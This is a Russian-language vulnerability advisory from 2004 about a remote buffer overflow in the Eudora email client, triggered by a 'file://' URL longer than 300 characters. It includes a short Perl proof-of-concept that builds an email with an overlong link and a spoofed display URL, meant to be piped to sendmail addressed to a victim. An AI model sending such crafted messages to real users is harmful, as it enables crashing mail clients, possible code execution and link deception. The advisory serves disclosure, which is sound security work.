Удаленное переполнение буфера в Eudora в 'file://' URL

Дата публикации:
10.05.2004
Всего просмотров:
1331
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Eudora 6.1, 6.0.3 и 5.2.1

Описание: Переполнение буфера обнаружено в Eudora в 'file://' URL. Удаленный пользователь может выполнить произвольный код на уязвимой системе.

Удаленный пользователь может послать email сообщение, содержащее специально обработанный 'file://' URL, длиннее 300 символов, чтобы вызвать переполнение буфера и выполнить произвольный код на уязвимой системе.

Пример/Эксплоит:

#!/usr/bin/perl --
print "From: me\n";
print "To: you\n";
print "Subject: Eudora file URL buffer overflow demo\n";
print "X-Use: Pipe the output of this script into:  sendmail -i victim\n\n";
print "The following is a \"proper\" HTML URL, pointing to somewhere long:\n";
print "<x-html>\n";
print "<a href=\"C:\\", "A"x300, "\">\n";
print "Fake URL to http://anywhere/I/want</a>\n";
print "</x-html>\n";
print "Clicking above will crash Eudora.\n\n";
print "The following plain-text converted by Eudora into a clickable URL\n";
print "http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxx\n";
print "is for comparison: the user can hardly tell them apart.\n\n";

URL производителя:http://www.eudora.com/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: [Full-Disclosure] Eudora file URL buffer overflow

или введите имя

CAPTCHA